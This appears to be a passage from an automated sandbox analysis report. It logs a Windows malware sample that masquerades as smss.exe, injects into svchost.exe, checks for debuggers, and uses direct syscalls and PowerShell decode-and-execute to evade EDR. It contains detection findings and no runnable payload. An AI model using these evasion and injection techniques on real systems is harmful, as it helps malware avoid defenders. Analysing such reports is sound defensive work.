Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BBF7AF mov eax, dword ptr fs:[00000030h] 7_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B307AF mov eax, dword ptr fs:[00000030h] 7_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF78A mov eax, dword ptr fs:[00000030h] 7_2_03BEF78A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h] 7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B347FB mov eax, dword ptr fs:[00000030h] 7_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h] 7_2_03B3D7E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B527ED mov eax, dword ptr fs:[00000030h] 7_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3C7C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B357C0 mov eax, dword ptr fs:[00000030h] 7_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C037B6 mov eax, dword ptr fs:[00000030h] 7_2_03C037B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h] 7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29730 mov eax, dword ptr fs:[00000030h] 7_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B65734 mov eax, dword ptr fs:[00000030h] 7_2_03B65734
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h] 7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3973A mov eax, dword ptr fs:[00000030h] 7_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C03749 mov eax, dword ptr fs:[00000030h] 7_2_03C03749
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov ecx, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6273C mov eax, dword ptr fs:[00000030h] 7_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAC730 mov eax, dword ptr fs:[00000030h] 7_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF72E mov eax, dword ptr fs:[00000030h] 7_2_03BEF72E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33720 mov eax, dword ptr fs:[00000030h] 7_2_03B33720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4F720 mov eax, dword ptr fs:[00000030h] 7_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF972B mov eax, dword ptr fs:[00000030h] 7_2_03BF972B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h] 7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C720 mov eax, dword ptr fs:[00000030h] 7_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30710 mov eax, dword ptr fs:[00000030h] 7_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B60710 mov eax, dword ptr fs:[00000030h] 7_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h] 7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F71F mov eax, dword ptr fs:[00000030h] 7_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37703 mov eax, dword ptr fs:[00000030h] 7_2_03B37703
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h] 7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B35702 mov eax, dword ptr fs:[00000030h] 7_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C700 mov eax, dword ptr fs:[00000030h] 7_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B38770 mov eax, dword ptr fs:[00000030h] 7_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B40770 mov eax, dword ptr fs:[00000030h] 7_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B765 mov eax, dword ptr fs:[00000030h] 7_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B30750 mov eax, dword ptr fs:[00000030h] 7_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h] 7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72750 mov eax, dword ptr fs:[00000030h] 7_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB4755 mov eax, dword ptr fs:[00000030h] 7_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B43740 mov eax, dword ptr fs:[00000030h] 7_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov esi, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6674D mov eax, dword ptr fs:[00000030h] 7_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C0B73C mov eax, dword ptr fs:[00000030h] 7_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B276B2 mov eax, dword ptr fs:[00000030h] 7_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B666B0 mov eax, dword ptr fs:[00000030h] 7_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6C6A6 mov eax, dword ptr fs:[00000030h] 7_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h] 7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D6AA mov eax, dword ptr fs:[00000030h] 7_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h] 7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34690 mov eax, dword ptr fs:[00000030h] 7_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB368C mov eax, dword ptr fs:[00000030h] 7_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE6F2 mov eax, dword ptr fs:[00000030h] 7_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h] 7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB06F1 mov eax, dword ptr fs:[00000030h] 7_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BED6F0 mov eax, dword ptr fs:[00000030h] 7_2_03BED6F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC36EE mov eax, dword ptr fs:[00000030h] 7_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D6E0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B636EF mov eax, dword ptr fs:[00000030h] 7_2_03B636EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A6C7 mov eax, dword ptr fs:[00000030h] 7_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3B6C0 mov eax, dword ptr fs:[00000030h] 7_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF16CC mov eax, dword ptr fs:[00000030h] 7_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEF6C7 mov eax, dword ptr fs:[00000030h] 7_2_03BEF6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B616CF mov eax, dword ptr fs:[00000030h] 7_2_03B616CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E627 mov eax, dword ptr fs:[00000030h] 7_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F626 mov eax, dword ptr fs:[00000030h] 7_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B66620 mov eax, dword ptr fs:[00000030h] 7_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B68620 mov eax, dword ptr fs:[00000030h] 7_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3262C mov eax, dword ptr fs:[00000030h] 7_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h] 7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B33616 mov eax, dword ptr fs:[00000030h] 7_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B72619 mov eax, dword ptr fs:[00000030h] 7_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B61607 mov eax, dword ptr fs:[00000030h] 7_2_03B61607
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BAE609 mov eax, dword ptr fs:[00000030h] 7_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6F603 mov eax, dword ptr fs:[00000030h] 7_2_03B6F603
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4260B mov eax, dword ptr fs:[00000030h] 7_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B62674 mov eax, dword ptr fs:[00000030h] 7_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF866E mov eax, dword ptr fs:[00000030h] 7_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF866E mov eax, dword ptr fs:[00000030h] 7_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A660 mov eax, dword ptr fs:[00000030h] 7_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6A660 mov eax, dword ptr fs:[00000030h] 7_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B69660 mov eax, dword ptr fs:[00000030h] 7_2_03B69660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B69660 mov eax, dword ptr fs:[00000030h] 7_2_03B69660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4C640 mov eax, dword ptr fs:[00000030h] 7_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05636 mov eax, dword ptr fs:[00000030h] 7_2_03C05636
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 6_2_00A780A9
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4A124 SetUnhandledExceptionFilter, 6_2_00A4A124
Source: C:\Users\user\AppData\Roaming\smss.exe Code function: 6_2_00A4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00A4A155

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell decode and execute
Source: Yara match File source: amsi32_8100.amsi.csv, type: OTHER
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQuerySystemInformation: Direct from: 0x772748CC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQueryVolumeInformationFile: Direct from: 0x77272F2C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtOpenSection: Direct from: 0x77272E0C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtReadVirtualMemory: Direct from: 0x77272E8C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtCreateKey: Direct from: 0x77272C6C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtSetInformationThread: Direct from: 0x77272B4C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQueryAttributesFile: Direct from: 0x77272E6C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtAllocateVirtualMemory: Direct from: 0x772748EC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQueryInformationToken: Direct from: 0x77272CAC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtTerminateThread: Direct from: 0x77272FCC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtOpenKeyEx: Direct from: 0x77272B9C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtDeviceIoControlFile: Direct from: 0x77272AEC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtAllocateVirtualMemory: Direct from: 0x77272BEC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtProtectVirtualMemory: Direct from: 0x77267B2E Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtCreateFile: Direct from: 0x77272FEC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtOpenFile: Direct from: 0x77272DCC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtWriteVirtualMemory: Direct from: 0x77272E3C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtMapViewOfSection: Direct from: 0x77272D1C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtResumeThread: Direct from: 0x772736AC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtProtectVirtualMemory: Direct from: 0x77272F9C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtSetInformationProcess: Direct from: 0x77272C5C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtNotifyChangeKey: Direct from: 0x77273C2C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtUnmapViewOfSection: Direct from: 0x77272D3C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtCreateMutant: Direct from: 0x772735CC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtSetInformationThread: Direct from: 0x772663F9 Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQueryInformationProcess: Direct from: 0x77272C26 Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtResumeThread: Direct from: 0x77272FBC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtCreateUserProcess: Direct from: 0x7727371C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtWriteVirtualMemory: Direct from: 0x7727490C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtAllocateVirtualMemory: Direct from: 0x77273C9C Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtAllocateVirtualMemory: Direct from: 0x77272BFC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtReadFile: Direct from: 0x77272ADC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtQuerySystemInformation: Direct from: 0x77272DFC Jump to behavior
Source: C:\Program Files (x86)\tbzciNlUnTssWUCBrcdfRNsczFkueNnjnRaMnxhByRwbUvCzkHQ\7HLXbJFcuuGutQgrmx.exe NtDelayExecution: Direct from: 0x77272DDC Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\smss.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
